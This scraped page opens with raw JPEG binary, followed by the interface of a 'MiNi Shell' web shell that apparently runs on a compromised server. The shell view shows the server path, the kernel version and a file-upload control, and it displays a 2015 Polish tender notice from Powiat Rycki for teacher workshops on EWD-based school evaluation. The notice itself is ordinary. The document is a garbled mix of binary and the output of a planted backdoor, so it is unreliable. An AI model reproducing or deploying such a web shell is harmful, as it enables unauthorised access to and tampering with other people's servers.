JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150114/8866-N-2015.html

<p class="kh_header"><b>Ryki: Przeprowadzenie warsztatów oraz konsultacji grupowych i indywidualnych w zadaniu Wykorzystanie EWD w ewaluacji wewnętrznej szkoły w ramach projektu pn. Kompleksowe wspomaganie szkół i przedszkoli w powiecie ryckim współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet III. Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół</b><br>
<b>Numer ogłoszenia: 8866 - 2015; data zamieszczenia: 14.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Rycki , ul. Wyczółkowskiego 10A, 08-500 Ryki, woj. lubelskie, tel. 081 8657450, 8657472, faks 081 8651966.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spryki.bip.lubelskie.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.spryki.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów oraz konsultacji grupowych i indywidualnych w zadaniu Wykorzystanie EWD w ewaluacji wewnętrznej szkoły w ramach projektu pn. Kompleksowe wspomaganie szkół i przedszkoli w powiecie ryckim współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet III. Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia - Przeprowadzenie warsztatów oraz konsultacji grupowych i indywidualnych  w ramach projektu pn. Kompleksowe wspomaganie szkół i przedszkoli w Powiecie Ryckim współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet III. Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół, w obszarze wsparcia wg ORE nr 5 - Wykorzystanie EWD w ewaluacji wewnętrznej szkoły będzie realizowany nw. placówkach: 
- Gimnazjum w Zespole Szkół w Czernicu, Czernic 95, 08-550 Kłoczew,
- Technikum Budowlane  w Zespole Szkół Zawodowych Nr 2 im. Leona Wyczółkowskiego w Rykach, ul. Wyczółkowskiego 10, 08-500 Ryki,
- Technikum Mechaniczne w Zespole Szkół Zawodowych Nr 1 im. gen. Franciszka Kleeberga w Dęblinie, ul. Tysiąclecia 3, 08-530 Dęblin,
- Technikum Gastronomiczne w Zespole Szkół Zawodowych Nr 2  im. Marii Dąbrowskiej w Dęblinie, ul. Wiślana 3b, 08-530 Dęblin.
Zadanie Wykorzystanie EWD w ewaluacji wewnętrznej szkoły (oferta Nr 5 wg ORE)
a) zakres rzeczowy:                                                                     
- warsztaty grupowe (4 szkoły x 15 godz.)=60  godz. lekcyjnych,                                                                                                                      - konsultacje grupowe/wykłady grupowe (4 szkoły x 12 godz.)=48  godz. lekcyjnych,                                                                                     - konsultacje indywidualne/ spotkania coachingowe (4 szkoły x 10 godz.)=40  godz. zegarowych,                                                                                                              - konsultacje grupowe/podsumowanie(4 szkoły x 2,5 godz.)=10  godz. zegarowych.                                                                                 b)zakres tematyczny:
- wykorzystanie EWD do doskonalenia pracy szkoły,                                                                                                    
- analiza i interpretacja informacji dostępnych na platformie EWD,                                                                               
- wykorzystanie informacji z analizy EWD w pracy nauczycieli, wychowawców, zespołów ewaluacji wewnętrznej.
Zamawiający nie dopuszcza możliwość składania ofert częściowych.
 W ramach zadania realizowane będą:
a) Warsztaty grupowe - forma kształcenia, każda aktywna metoda szkoleniowa angażująca uczestników w różnego rodzaju ćwiczenia, gry, symulacje lub inne działania mające na celu nabywanie wiedzy, doskonalenie umiejętności oraz kształtowanie postaw uczestników w zakresie wcześniej ustalonego obszaru tematycznego podzielonego na moduły szkoleniowe. Grupa warsztatowa powinna liczyć optymalnie do 25 uczestników. 
b) Konsultacje grupowe/wykłady grupowe wspierające proces wspomagania nauczycieli w szkole - zorganizowana forma doskonalenia, spotkania grupowe nauczycieli (optymalna grupa do 25 osób) z ekspertem, dotyczące tematyki objętej wspomaganiem w szkole; w trakcie konsultacji nauczyciele mogą wskazać ważne z ich punktu widzenia problemy związane z tematyką wspomagania, które są szczegółowo wyjaśnione i rozwinięte przez eksperta w formach informacyjnych i ćwiczeniowych; konsultacje grupowe/wykłady grupowe prowadzi ekspert.
c) Konsultacje indywidualne/ spotkania coachingowe - indywidualne spotkania nauczycieli z ekspertem zewnętrznym, dotyczące tematyki objętej wspomaganiem w szkole/przedszkolu; w trakcie konsultacji nauczyciele mogą przedyskutować z ekspertem zewnętrznym swoje wątpliwości, omówić problemy, przedstawić nowe rozwiązania związane z wdrażaniem do rzeczywistości szkolnej umiejętności nabytych w formach doskonalenia prowadzonego w ramach realizowanego rocznego planu wspomagania (RPW).
d) Konsultacje grupowe/podsumowanie (wspierające proces przełożenia nowych umiejętności na praktykę szkolną) - spotkania grupowe nauczycieli (optymalna grupa do 25 osób) z ekspertem, dotyczące tematyki objętej wspomaganiem w szkole; w trakcie konsultacji nauczyciele mogą podzielić się swoimi wątpliwościami, wymienić się doświadczeniami i spostrzeżeniami, poszukiwać wspólnie nowych rozwiązań, omówić bieżące problemy związane z wdrażaniem do rzeczywistości szkolnej umiejętności nabytych w formach doskonalenia prowadzonego w ramach realizowanego RPW; konsultacje grupowe prowadzi ekspert lub SORE, który może pełnić tu rolę konsultanta, mentora lub facilitatora. 
Warsztaty grupowe, konsultacje grupowe, wykłady grupowe i konsultacje indywidualne/ spotkania coachingowe Wykonawca przeprowadzi zgodnie z harmonogramem przedstawionym i zatwierdzonym przez Szkolnego Organizatora Rozwoju Edukacji SORE przy następujących założeniach:
a) w ramach wspierania procesu wspomagania szkół i przedszkoli w powiecie ryckim:                                                                 - 45 minutowe warsztaty grupowe - 15 godz. w ramach oferty doskonalenia realizowanej 
w szkole/przedszkolu (3 spotkania po 5 godz. dla każdej grupy). 
-    45 minutowe konsultacje grupowe/wykłady grupowe - 12 godz. w ramach oferty doskonalenia realizowanej w szkole/przedszkolu (2 spotkania po 6 godz. dla każdej grupy).
b) w ramach wspierania procesu przełożenia nowych umiejętności nauczycieli na praktykę szkolną:
 - 60 minutowe konsultacje indywidualne/spotkania coachingowe - 10 godz. w ramach oferty doskonalenia realizowanej w szkole/przedszkolu. 
- 60 minutowe konsultacje grupowe - 2,5 godz. w ramach oferty realizowanej 
w szkole/przedszkolu. 
Zaleca się, aby harmonogram nie kolidował z zajęciami szkolnymi oraz innymi wydarzeniami odbywającymi się w szkole/przedszkolu. 
Wymaga się od Wykonawcy przekazania uczestnikom warsztatu/konsultacji grupowych materiałów szkoleniowych, w szczególności przedstawianych prezentacji oraz opracowanych i wypełnionych arkuszy ćwiczeniowych wraz z wnioskami i rekomendacjami do wykorzystania w procesie edukacyjnym. Przekazywane materiały muszą być sporządzone w sposób czytelny. 
Wykonawca jest zobowiązany do prowadzenia dokumentacji w postaci: scenariusza warsztatu/ konsultacji, dziennika zajęć, listy obecności, przekazanej jako wzór przez SORE; przygotowania i przeprowadzenia ankiety zadowolenia wśród uczestników po każdym module prowadzonym przez jednego eksperta oraz przygotowanie na zakończenie każdego miesiąca raportu uwzględniającego wyniki ankiet.
Wykonawca po ukończeniu przez uczestników form szkoleniowych wystawia uczestnikom zaświadczenia.
W ramach promocji projektu Wykonawca jest zobowiązany do:
a) oznakowania sal, w których odbywać się będą zajęcia, zgodnie z Wytycznymi PO KL, przygotowanymi tabliczkami przez Zamawiającego,
b) poinformowania uczestników o fakcie współfinansowania ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c) stosowania na wszystkich dokumentach znaków: PO KL, logo Unii Europejskiej wraz z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, zgodnie z Wytycznymi dotyczącymi oznakowania projektów w ramach PO KL.
Materiały pomocnicze (notes, długopis, teczka, pendrive) dla uczestników zapewnia Zamawiający.
Zamawiający zapewnia serwis kawowy dla uczestników, dlatego Wykonawca zobowiązany jest do przeprowadzenia przerwy trwającej min. 20 minut. 
Sale i pracownie przewidziane na realizację warsztatu w danej szkole/ przedszkolu udostępniane są Wykonawcy bezpłatnie. 
 Sprzęt i wszelkie pomoce niezbędne do realizacji zadania Wykonawca musi zapewnić na swój koszt, z wyjątkiem tego, czym dysponuje Zamawiający, tj. rzutnikiem, mobilną tablicą multimedialną, komputerem przenośnym,  udostępnianego przez Szkolnego Organizatora Rozwoju Edukacji. W przypadku kilku szkoleń odbywających się jednocześnie i braku dostępnego w/w sprzętu, Wykonawca zapewnia potrzebny sprzęt we własnym zakresie.
Zamawiający zastrzega sobie prawo do pełnej kontroli przeprowadzanych spotkań, w tym do wykonywania zdjęć oraz wszelkiej dokumentacji obrazującej wykonanie zadania.
Rozliczenie nastąpi na podstawie wystawionej faktury/rachunku, w okresach miesięcznych.
Wykonawca (ekspert) w ramach realizacji zadania jest zobowiązany do wykonania następujących czynności:
1) Ustalenia z SORE szczegółowego zakresu tematycznego szkoleń w ramach oferty doskonalenia zaplanowanej w RPW każdej szkoły
2) Przygotowania konspektu poszczególnych zajęć oraz przekazanie SORE do uzgodnienia  na 5 dni przed terminem ich realizacji,  
3) Stałej współpracy z SORE,   
4) Opracowania i przekazania Zmawiającemu materiałów szkoleniowych nie później niż na 3 dni przed rozpoczęciem szkoleń w formie papierowej lub/i elektronicznej dla każdego uczestnika szkolenia.  Przekazywane materiały muszą być sporządzone w sposób czytelny i zawierać logotypy obowiązujące w projekcie, 
5) Przeprowadzania szkoleń zgodnie z harmonogramem,   
6) Wypełnianie dokumentacji projektowej opracowanej przez biuro projektu oraz innych dokumentów niezbędnych do realizacji zadania,   
7) Wystawienia uczestnikom szkoleń zaświadczeń o ukończeniu szkolenia w danym obszarze z wyszczególnieniem tematów modułów, godzin zajęć praktycznych i teoretycznych.   
8) Przeprowadzenia ewaluacji każdego spotkania szkoleniowego i dostarczenie do biura projektu wyników badania ewaluacyjnego do 7 dni po zakończeniu szkolenia.
Osoba realizująca przedmiot zamówienia nie może być zatrudniona (dotyczy wyłącznie osób zatrudnionych w instytucjach uczestniczących w realizacji PO KL na podstawie stosunku pracy) w instytucjach uczestniczących w realizacji Programu Operacyjnego Kapitał Ludzki t. j. Instytucji Zarządzającej, Instytucji Pośredniczącej, Instytucji Wdrażającej, Regionalnych Ośrodkach EFS, Krajowym Ośrodku EFS, Krajowej Instytucji Wspomagającej, chyba że nie zachodzi konflikt interesów ani podwójne finansowanie. 
Łączne zaangażowanie zawodowe osoby realizującej przedmiot zamówienia w realizację wszystkich projektów finansowanych z funduszy strukturalnych i Funduszu Spójności oraz działań finansowanych z innych źródeł, w tym środków własnych Beneficjenta i innych podmiotów nie może przekroczyć 240 godzin miesięcznie. 
Wykonawca - osoba realizująca przedmiot zamówienia, którego oferta zostanie wybrana jako najkorzystniejsza, przed zawarciem umowy złoży oświadczenie o łącznym zaangażowaniu oraz niewystępowaniu konfliktu interesów oraz podwójnego finansowania w przypadku zatrudnienia w instytucjach uczestniczących w realizacji PO KL (wg wzoru stanowiącego załącznik Nr 3 do umowy)
Wykonawca - osoba realizująca przedmiot zamówienia, zobowiązana będzie do przedkładania wraz z rachunkiem bądź fakturą kart pracy, potwierdzających fakt przepracowania godzin w danym okresie rozliczeniowym. Wykonawca - osoba realizująca przedmiot zamówienia zaangażowana w realizację więcej niż jednego projektu prowadzi ewidencję godzin i zadań realizowanych w ramach wszystkich projektów NSRO i przedkłada wraz z rachunkiem bądź fakturą..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na przeprowadzeniu szkoleń (np. warsztatów, konsultacji grupowych i indywidualnych dla grupy nauczycieli) potwierdzoną dokumentami wskazującymi należyte wykonanie usługi</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą, spełniającą łącznie następujące warunki:
1) Wykształcenie: studia wyższe II stopnia.
2) Doświadczenie w edukacji:
a) ukończone studia lub studia podyplomowe lub dłuższe formy doskonalenia zawodowego typu kursy/ szkolenia odpowiadające zakresowi tematycznemu oferty doskonalenia,
b) ukończone kursy lub studia przygotowujące do pracy trenera lub edukatora lub coacha lub lidera przedsięwzięć edukacyjnych związanych np. z wdrażaniem zmian w systemie edukacji lub pełnienie funkcji doradcy metodycznego w ostatnich 3 latach przed dniem składania ofert lub pełnienie funkcji nauczyciela konsultanta w ostatnich 3 latach przed dniem składania ofert.                        
3) Doświadczenie w pracy z grupą osób dorosłych - prowadzenie różnych form pracy z grupami osób dorosłych, w tym działań realizowanych w szkołach i skierowanych do nauczycieli (np. kursów, warsztatów, konsultacji, przygotowanie i prowadzenie lekcji otwartych, szkolenia rad pedagogicznych, nauczycielskich grup przedmiotowych, doradztwo) w wymiarze nie mniejszym niż 30 godzin dydaktycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Doświadczenie osób , które pełnić będą funkcję ekspertów w pracy z grupą osób dorosłych - 6</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
dopuszcza się zmianę osoby wskazanej w ofercie jedynie w formie pisemnej w przypadkach wystąpienia sytuacji losowych udokumentowanych przez Wykonawcę tylko i wyłącznie za pisemną zgodą Zamawiającego. Osoba jak powyżej musi spełniać wymagania określone w SIWZ.
nastąpi zmiana przepisów wpływających na realizacje przedmiotu zamówienia,
konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowane jest zamówienie,
 konieczność wprowadzenia zmian będzie następstwem zmian Wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub Wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej;
 konieczność wprowadzenia zmian będzie następstwem zmian organizacyjnych po stronie Zamawiającego;
z powodu okoliczności siły wyższej, np.: wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć  w chwili zawarcia umowy.
Strona dążąca do zmiany umowy każdorazowo obowiązana jest przedstawić na piśmie argumenty przemawiające za dokonaniem zmian do umowy. Wszystkie zmiany mogą być dokonane na podstawie aneksu do umowy wprowadzającego te zmiany podpisanego przez obie strony umowy.
Zamawiający przewiduje zmianę terminu zakończenia umowy w przypadku rozwiązania umowy lub zaprzestania finansowania przez instytucję pośredniczącą.
Zamawiający dopuszcza w uzasadnionych przypadkach zmianę kadry dydaktycznej z zastrzeżeniem par. 1 ust. 9 umowy, po pisemnym zgłoszeniu wniosku przez Wykonawcę oraz po akceptacji ze strony Zamawiającego. Zmiana ta nie wymaga zawarcia aneksu do umowy lub Wykonawca świadczący usługi osobiście nie może powierzyć osobom trzecim wykonania czynności określonych niniejszą umową bez uprzedniego uzyskania pisemnej zgody Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spryki.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Rykach przy ul. Wyczółkowskiego 10A, 08-500 Ryki, pokój 214 (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2015 godzina 12:00, miejsce: Starostwo Powiatowe w Rykach przy ul. Wyczółkowskiego 10A, 08-500 Ryki, pokój 103 (sekretariat - I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




